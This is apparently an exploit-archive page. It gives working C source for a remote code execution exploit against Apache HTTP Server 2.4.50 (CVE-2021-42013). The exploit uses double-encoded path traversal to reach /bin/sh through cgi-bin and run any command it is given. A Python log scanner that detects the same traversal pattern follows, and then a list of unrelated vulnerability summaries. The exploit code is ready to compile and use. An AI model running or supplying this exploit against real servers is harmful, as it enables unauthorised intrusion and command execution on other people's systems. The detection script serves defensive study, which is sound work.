Apache 2.4.50 Remote Code Execution
Apache HTTP Server 2.4.50 remote code execution exploit that leverages the double-URL-encoded path traversal identified in CVE-2021-42013. Written in C.
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <curl/curl.h>

/* Apache 2.4.50 exploit (CVE-2021-42013)
 * Author: Vilius Povilaika
 * Website: www.povilaika.com
 */

// compile: $ gcc cve-2021-42013.c -lcurl -o cve-2021-42013

int usage(char* prog)
{
    printf("Usage: %s <host> <exec>\n", prog);
    printf(" - %s https://127.0.0.1 \"uname -a\"\n", prog);
    return 0;
}

bool error(const char* reason)
{
    printf("[ERR] Critical error - %s\n", reason);
    return false;
}

/* Growable buffer that accumulates the HTTP response body */
struct callback_result {
    char* data;
    size_t size;
};

/* libcurl write callback: append the received chunk to the buffer */
static size_t callback(void* pointer, size_t size, size_t nmemb, void* data)
{
    struct callback_result *memory = (struct callback_result *)data;
    size_t bytes = size * nmemb;
    char* ptr = realloc(memory->data, memory->size + bytes + 1);
    if (ptr == NULL)
        return 0; /* returning less than 'bytes' makes libcurl abort the transfer */
    memory->data = ptr;
    memcpy(&(memory->data[memory->size]), pointer, bytes);
    memory->size += bytes;
    memory->data[memory->size] = 0;
    return bytes;
}

bool exploit(void* result, char* host, char* exec)
{
    CURL *curl = curl_easy_init();
    if (curl == NULL)
        return error("curl_easy_init failed");

    /* Double-encoded ".." segments (.%%32%65) are the CVE-2021-42013 traversal */
    char url[256];
    snprintf(url, sizeof(url),
             "%s/cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh",
             host);
    curl_easy_setopt(curl, CURLOPT_URL, url);

    char payload[256];
    snprintf(payload, sizeof(payload), "echo Content-Type: text/plain; echo; %s", exec);
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, payload);
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, result);

    CURLcode res = curl_easy_perform(curl);
    curl_easy_cleanup(curl);
    if (res != CURLE_OK)
        return error(curl_easy_strerror(res));
    return true;
}

int main(int argc, char* argv[])
{
    if (argc != 3)
        return usage(argv[0]);

    curl_global_init(CURL_GLOBAL_DEFAULT);
    struct callback_result result = {0};
    bool res = exploit(&result, argv[1], argv[2]);
    if (res)
        printf("[+] Exploit finished successfully, check output\n");
    else
        printf("[-] Exploit failed, check output\n");
    printf(" \n%s\n", result.data ? result.data : "(no response body)");
    free(result.data);
    curl_global_cleanup();
    return 0;
}
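From the defender's side, the traversal above only works because the request path has to be percent-decoded more than once before the ".." segments appear, which is also what makes it easy to spot in access logs. The following Python is an added example, not part of the original exploit or of Apache httpd: it reads constructed Apache combined-format log lines (sample data invented here), decodes each request target until it stops changing, resolves "." and ".." segments, and flags any request that needed more than one decoding round or whose resolved path climbs above the document root. The log lines, the `scan_log` and `analyse_target` function names and the alert structure are all assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (not taken from any real server); the second
# line mirrors the double-encoded traversal pattern used by CVE-2021-42013.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Oct/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.0.7 - - [06/Oct/2021:12:00:02 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 85 "-" "curl/7.79.1"
10.0.0.8 - - [06/Oct/2021:12:00:03 +0000] "GET /cgi-bin/.%2e/.%2e/etc/passwd HTTP/1.1" 403 199 "-" "curl/7.79.1"
10.0.0.9 - - [06/Oct/2021:12:00:04 +0000] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
"""

# Extracts method and request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')


def fully_decode(path, max_rounds=4):
    """Percent-decode until the string stops changing (bounded), so that
    both %2e and the doubly encoded %%32%65 collapse to a literal '.'."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def normalise(path):
    """Resolve '.' and '..' segments the way a filesystem would and report
    whether the path ever climbed above its root."""
    escaped = False
    stack = []
    for seg in path.split("?", 1)[0].split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escaped = True
            continue
        stack.append(seg)
    return "/" + "/".join(stack), escaped


def analyse_target(raw_target):
    """Return the indicators a detection rule would key on for one request."""
    once = unquote(raw_target)
    decoded = fully_decode(raw_target)
    resolved, escaped = normalise(decoded)
    segments = decoded.split("?", 1)[0].split("/")
    return {
        "decoded": decoded,
        "resolved": resolved,
        "multi_decode": decoded != once,   # needed more than one decode round
        "traversal": ".." in segments,      # '..' only visible after decoding
        "escaped_root": escaped,
    }


def scan_log(text):
    """Yield (client_ip, raw_target, indicators) for suspicious requests."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        info = analyse_target(m.group("target"))
        if info["traversal"] or info["multi_decode"]:
            alerts.append((line.split(" ", 1)[0], m.group("target"), info))
    return alerts


if __name__ == "__main__":
    for ip, target, info in scan_log(SAMPLE_LOG):
        print(f"{ip} {target} -> {info['resolved']} "
              f"multi_decode={info['multi_decode']} escaped_root={info['escaped_root']}")
```

The multi-round decode is the important design choice: a rule that decodes once sees `.%2e` for the CVE-2021-42013 request and misses it, while a rule that only matches the literal string `%%32%65` misses every other encoding of the same bytes. Alerting on "needed a second decode round" catches the whole class, and `escaped_root` separates a real escape from the aliased directory from harmless relative paths.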
Related news
The Zerobot DDoS botnet has received substantial updates that expand on its ability to target more internet-connected devices and scale its network. Microsoft Threat Intelligence Center (MSTIC) is tracking the ongoing threat under the moniker DEV-1061, its designation for unknown, emerging, or developing activity clusters. Zerobot, first documented by Fortinet FortiGuard Labs earlier this month,
Gentoo Linux Security Advisory 202208-20 - Multiple vulnerabilities have been discovered in Apache Webserver, the worst of which could result in remote code execution. Versions less than 2.4.54 are affected.
Pexip Infinity 27 before 28.0 allows remote attackers to trigger excessive resource consumption and termination because of registrar resource mishandling.
Pexip Infinity before 28.1 allows remote attackers to trigger a software abort via G.719.
Pexip Infinity 27.x before 27.2 has Improper Access Control. An attacker can sometimes join a conference (call join) if it has a lock but not a PIN.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via H.323.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via Epic Telehealth.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via HTTP.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via One Touch Join.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via One Touch Join.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via the Session Initiation Protocol.
Pexip Infinity before 27.3 allows remote attackers to trigger excessive resource consumption via H.264.
Pexip Infinity 27.x before 27.3 allows remote attackers to trigger a software abort via HTTP.
Pexip Infinity 27.x before 27.3 allows remote attackers to trigger a software abort via the Session Initiation Protocol.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort via One Touch Join.
Pexip Infinity before 27.3 allows remote attackers to trigger a software abort, and possibly enumerate usernames, via One Touch Join.
Pexip Infinity before 27.3 allows remote attackers to force a software abort via HTTP.
Pexip Infinity 27.x before 27.3 allows remote attackers to trigger a software abort via single-sign-on if a random Universally Unique Identifier is guessed.
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service ...
If LimitXMLRequestBody is set to allow request bodies larger than 350MB (the default is 1M) on 32-bit systems, an integer overflow occurs which later causes out-of-bounds writes. This issue affects Apache HTTP Server 2.4.52 and earlier.
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H).
A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the vulnerability, though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and earlier.
Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in an HTTP/2 request would result in a crash when the server later tries to HTTP/2 PUSH a resource. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.